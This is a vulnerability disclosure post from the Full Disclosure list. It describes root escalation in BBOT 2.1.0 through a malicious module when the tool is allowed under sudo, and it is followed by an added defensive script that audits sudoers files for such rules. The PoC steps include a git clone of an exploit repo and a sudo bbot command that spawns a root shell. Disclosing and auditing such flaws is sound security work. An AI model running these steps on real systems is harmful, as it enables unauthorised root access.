Hi Full Disclosure, I'd like to share a local privilege escalation technique involving BBOT (Bighuge BLS OSINT Tool) when misconfigured with sudo access.
---
Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution
Date: 2025-04-16
Exploit Author: Huseyin Mardinli
Vendor Homepage: https://github.com/blacklanternsecurity/bbot
Version: 2.1.0.4939rc (tested)
Tested on: Kali Linux Rolling (2025.1)
CVE: N/A
Platform: Linux
Type: Local

### Description:
BBOT allows execution of custom Python modules during OSINT scans. When configured as a sudo-executable (e.g., via NOPASSWD), a malicious module can escalate privileges via the `setup()` function.

### PoC Steps:
1. Clone: git clone https://github.com/Housma/bbot-privesc.git
2. Run with sudo: sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT
3. A root shell is spawned via `bash -p` from within the module.

### GitHub (Full Write-up + PoC):
https://github.com/Housma/bbot-privesc
---

This exploit highlights how trusted open-source tools can be abused in real-world environments.

Regards,
Huseyin Mardinli

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
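
A defender-side audit for the misconfiguration described in the post, as an added example that is not part of the original message or the BBOT project: it scans sudoers text for rules that let a user run bbot through sudo, resolving `Cmnd_Alias` entries and line continuations. The sudoers sample, the user names and the `audit` helper are constructed for illustration; include directives and user/host aliases are not followed.

```python
import re

# Constructed sample sudoers content (not from the original post).
SAMPLE_SUDOERS = r'''
Defaults env_reset
Cmnd_Alias RECON = /usr/bin/nmap, \
                   /usr/local/bin/bbot
alice ALL=(ALL) NOPASSWD: /usr/local/bin/bbot
bob   ALL=(root) RECON
carol ALL=(root) NOPASSWD: /usr/local/bin/bbot ""
dave  ALL=(ALL) /usr/bin/systemctl restart nginx
'''

def logical_lines(text):
    """Join backslash continuations, then drop comments and blank lines."""
    joined = re.sub(r"\\\n\s*", " ", text)
    for line in joined.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line

def audit(text, tool="bbot"):
    """Return (user, command, nopasswd, free_args) for each rule granting `tool`.

    free_args is True when the rule does not pin the arguments to "" (none),
    i.e. the caller can pass options such as a preset that loads a module.
    """
    aliases, findings = {}, []
    for line in logical_lines(text):
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
            continue
        m = re.match(r"(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.+)", line)
        if not m or line.startswith("Defaults"):
            continue
        user, spec = m.groups()
        nopasswd = "NOPASSWD:" in spec
        spec = re.sub(r"\b[A-Z]+:\s*", "", spec)  # strip tags such as NOPASSWD:
        for cmd in spec.split(","):
            for c in aliases.get(cmd.strip(), [cmd.strip()]):
                parts = c.split(None, 1)
                args = parts[1] if len(parts) > 1 else None
                if parts[0].rsplit("/", 1)[-1] == tool:
                    findings.append((user, c, nopasswd, args != '""'))
    return findings

if __name__ == "__main__":
    for user, cmd, nopasswd, free_args in audit(SAMPLE_SUDOERS):
        print(f"{user}: {cmd!r} nopasswd={nopasswd} free_args={free_args}")
```

Rules reported with `free_args=True` allow the `-p preset.yml` invocation shown in the PoC steps; run the function over the contents of `/etc/sudoers` and each file in `/etc/sudoers.d/` separately.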